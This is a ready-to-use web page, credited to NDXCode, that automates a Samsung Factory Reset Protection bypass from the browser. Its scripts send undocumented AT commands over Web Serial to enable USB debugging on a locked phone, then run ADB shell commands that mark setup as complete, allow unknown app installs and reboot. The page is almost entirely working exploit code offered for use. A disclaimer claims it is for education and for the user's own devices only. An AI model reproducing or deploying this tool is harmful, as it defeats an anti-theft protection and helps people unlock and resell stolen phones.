<!--Made by NDXCode-->
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <script src="webadb.js"></script>
    <title>Samsung FRP bypass from the browser | Automated | Made by NDXCode</title>
    <style>
        body {
            background: linear-gradient(45deg, #ffdd00, #ff00aa);
            font-family: "Comic Sans MS", "Courier New", sans-serif;
            color: #000;
            margin: 0;
            padding: 0;
        }

        .container {
            background-color: #00ffcc;
            border: 5px solid #ff00aa;
            padding: 20px;
            margin: 20px;
            box-shadow: 4px 4px 0px #000;
            text-align: center;
        }

        .log {
            background-color: #000;
            color: #00ffcc;
            font-family: "Courier New", monospace;
            padding: 10px;
            border: 3px dashed #ffdd00;
            height: 200px;
            overflow-y: scroll;
            box-shadow: inset 2px 2px 0px #000;
        }

        .controls {
            display: flex;
            justify-content: space-around;
            margin: 20px 0;
        }

        button {
            background: linear-gradient(135deg, #ff6600, #ffcc00);
            color: #000;
            font-size: 16px;
            font-weight: bold;
            padding: 10px 20px;
            border: 3px solid #00ffcc;
            border-radius: 5px;
            cursor: pointer;
            box-shadow: 2px 2px 0px #000;
            text-shadow: 1px 1px #ff00aa;
            transition: 0.2s;
        }

        button:hover {
            background: linear-gradient(135deg, #ffcc00, #ff6600);
            box-shadow: 4px 4px 0px #000;
            transform: translate(-2px, -2px);
            transition: 0.2s;
        }

        h1 {
            font-family: "Impact", "Arial Black", sans-serif;
            font-size: 48px;
            color: #ff00aa;
            text-shadow: 3px 3px 0px #00ffcc, -3px -3px 0px #ffdd00;
            text-transform: uppercase;
            margin-bottom: 20px;
            border-bottom: 5px dashed #ff00aa;
            padding-bottom: 5px;
            display: inline-block;
        }

        h3 {
            font-family: "Comic Sans MS", "Courier New", sans-serif;
            font-size: 24px;
            color: #00ffcc;
            text-shadow: 2px 2px 0px #ff00aa;
            background-color: #ffcc00;
            padding: 10px;
            padding-top: 0px;
            border: 3px solid #ff6600;
            display: inline-block;
            box-shadow: 2px 2px 0px #000;
            margin: 10px 0;
            margin-top: 50px;
        }

        center h3 {
            font-size: 30px;
            padding-top:5px;
            margin-top: 0px;
        }

        p {
            font-family: "Impact", "Arial Black", sans-serif;
            font-size: 25px;
            color: #ff00aa;
            text-shadow: 3px 3px 0px #00ffcc, -3px -3px 0px #ffdd00;
            text-transform: uppercase;
            border-bottom: 2px dashed #ff00aa;
            display: inline-block;
        }

        a {
            text-decoration: none;
        }

        .notice {
            margin-block: 0px;
            font-size: 1.5em;
            color: #ff0055;
            cursor: pointer;
        }

    </style>
</head>
<body>
    <center>
        <img src="smlogo.gif" alt="" style="max-width: 90%;"><br>
        <h3>Automated version</h3>
    </center>

    <div class="container">
        <h1>1. Enable USB debugging</h1>

        <div class="controls">
            <button id="connectButton">Connect to Serial Port</button>
        </div>

        <div class="command-list">
            <button onclick="sendAllCommands()">Enable</button>
        </div>

        <div>
            <h3>Log</h3>
            <div id="log" class="log"></div>
        </div>
    </div>

    <br><br>

    <div class="container">
        <h1>2. Bypass FRP lock</h1>

        <div class="controls">
            <button id="connectToPhone">Connect</button>
        </div>

        <div class="command-list">
            <button onclick="sendAllCommandsAdb()">Bypass</button>
        </div>


        <div>
            <h3>Log</h3>
            <div id="logadb" class="log"></div>
        </div>
    </div>

    <br><br>

    <div class="container">
        <p>Made by <a target="_blank" href="https://ndxcode.github.io/">NDXCode</a></p><br>
        <p class="notice" onclick="alert('This is for educational and research purposes only. Please do not use this on devices that are not your own. Data loss is likely so backup your stuff before you proceed. I am not liable for any kind of damage you cause with this tool.')">Notice</p>
    </div>

    <script>
        let port = null;
        let reader = null;
        let writer = null;
        var readableStreamClosed = null;
        var writableStreamClosed = null;
        var commands = [
            'AT+KSTRINGB=0,3\r\n',
            'AT+DUMPCTRL=1,0\r\n',
            'AT+DEBUGLVC=0,5\r\n',
            'AT+SWATD=0\r\n',
            'AT+ACTIVATE=0,0,0\r\n',
            'AT+SWATD=1\r\n'
        ];

        async function sendAllCommands() {
            for (let i = 0; i < commands.length; i++) {
                await sendCommand(commands[i]);
                await waitForResponse();
            }
        }

        async function waitForResponse() {
            return new Promise(resolve => {
                const interval = setInterval(() => {
                    if (lastReceivedResponse) { 
                        clearInterval(interval);
                        lastReceivedResponse = null;
                        resolve();
                    }
                }, 100);
            });
        }

        
        async function connectSerial() {
            try {
                port = await navigator.serial.requestPort();
                await port.open({
                    baudRate: 115200
                });

                const textDecoder = new TextDecoderStream();
                readableStreamClosed = port.readable.pipeTo(textDecoder.writable);
                const textEncoder = new TextEncoderStream();
                writableStreamClosed = textEncoder.readable.pipeTo(port.writable);

                reader = textDecoder.readable.getReader();
                writer = textEncoder.writable.getWriter();

                log('Connected to serial port');
                document.getElementById('connectButton').textContent = 'Disconnect';
                readLoop();
            } catch (err) {
                log('Error: ' + err.message);
            }
        }

        let lastReceivedResponse = null;

        async function readLoop() {
            try {
                while (true) {
                    const { value, done } = await reader.read();
                    if (done) {
                        reader.releaseLock();
                        break;
                    }
                    log('Received: ' + value);
                    // if (value.toLowerCase().includes("lost") && value.toLowerCase().includes("device")) {
                    //     log("USB Configuration of device changed, please refresh site and continue from where you left off");
                    //     break;
                    // }
                    lastReceivedResponse = value.trim();
                }
            } catch (err) {
                log('Error in read loop: ' + err.message);
            }
        }

        async function sendCommand(command) {
            if (!writer) {
                log('Not connected to any serial port');
                return;
            }

            try {
                log('Sending: ' + command);
                await writer.write(command);
                await new Promise(resolve => setTimeout(resolve, 500));
            } catch (err) {
                log('Error sending command: ' + err.message);
            }
        }

        function log(message) {
            const logDiv = document.getElementById('log');
            logDiv.innerHTML += message + '<br>';
            logDiv.scrollTop = logDiv.scrollHeight;
        }

        document.getElementById('connectButton').addEventListener('click', async () => {
            if (port) {
                try {
                    if (reader) {
                        await reader.cancel();
                        await readableStreamClosed.catch(() => { /* Ignore the error */ });
                    }
                    if (writer) {
                        await writer.close();
                        await writableStreamClosed;
                    }
                    await port.close();
                    port = null;
                    document.getElementById('connectButton').textContent = 'Connect to Serial Port';
                    log('Disconnected from serial port');
                } catch (err) {
                    log('Error disconnecting: ' + err.message);
                }
            } else {
                connectSerial();
            }
        });
    </script>


    <script>
        function logadb(message) {
            const logDiv = document.getElementById('logadb');
            logDiv.innerHTML += message + '<br>';
            logDiv.scrollTop = logDiv.scrollHeight;
        }

        let adb;
        var commandsAdb =[
            'settings put global setup_wizard_has_run 1',
            'settings put secure user_setup_complete 1',
            'content insert --uri content://settings/secure --bind name:s:DEVICE_PROVISIONED --bind value:i:1',
            'content insert --uri content://settings/secure --bind name:s:user_setup_complete --bind value:i:1',
            'content insert --uri content://settings/secure --bind name:s:INSTALL_NON_MARKET_APPS --bind value:i:1',
            'am start -c android.intent.category.HOME -a android.intent.action.MAIN',
            'am start -n com.android.settings/com.android.settings.Settings',
            'reboot'
        ];

        async function init() {
            while (true) {
                try {
                    let webusb = await Adb.open("WebUSB");
                    adb = await webusb.connectAdb("host::");
                    logadb("Connected to phone!")
                    break;
                } catch (error) {
                    if (error.message.includes("host::")) {
                        alert("Failed to connect for the first time!\nPress OK to try again")
                        console.log(`Retrying...`);
                        continue;
                    }
                    else {
                        throw error;
                    }
                }
            }
        }

        window.addEventListener('unload', async () => {
            webusb.close();
        });

        async function sendCommandAdb(command, index) {
            try {
                await adb.shell(command);
                logadb(`[${index+1}/8] OK`);
            } catch (error) {
                console.error("Command failed:", error);
            }
        }

        async function sendAllCommandsAdb() {
            for (let i = 0; i < commandsAdb.length; i++) {
                await sendCommandAdb(commandsAdb[i], i);
                await delay(2000);
            }
        }

        function delay(ms) {
            return new Promise(resolve => setTimeout(resolve, ms));
        }

        let cnt_btn = document.getElementById("connectToPhone");
        cnt_btn.addEventListener('click', function () {
            init().catch(console.error);
        });
    </script>
    
</body>
</html>
